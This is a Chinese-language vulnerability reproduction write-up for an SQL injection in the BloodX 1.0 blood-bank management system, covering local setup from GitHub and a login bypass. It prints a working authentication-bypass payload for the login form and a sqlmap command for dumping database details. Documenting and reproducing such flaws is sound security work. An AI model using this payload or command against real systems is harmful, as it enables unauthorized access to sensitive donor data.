1.漏洞简介
Diveshlunker Bloodx是Diveshlunker个人开发者的一个基于Php的用于血库管理的建站系统
2.影响范围
BloodX 1.0 版本存在SQL注入漏洞,该漏洞允许攻击者可利用该漏洞绕过认证。
3.环境搭建
3.1下载源码
https://github.com/diveshlunker/BloodX
3.2修改配置文件
打开数据库连接文件,将数据库用户名密码设置成本地数据库用户名密码
3.3导入数据库文件
执行命令后可以看到成功创建表
3.4访问页面
注册用户
登录登用户
出现如下错误
需要将更改login.php中的代码
将代码中的data['id']改为$data['id']
刷新后出现进入登录界面
登录后台
4.漏洞复现
在login.php中,'email'和'password'两个传参没有进行字符过滤就直接放入sql查询语句当中,导致sql注入
登录界面抓包,修改email和password可直接登录
Payload:email=or'='or&password=or'='or&submit=LOGIN
payload不光只有扫描这一个 还有其他的可以执行搜索
也可使用sqlmap工具
python sqlmap.py -r cheshi.txt --batch --current-db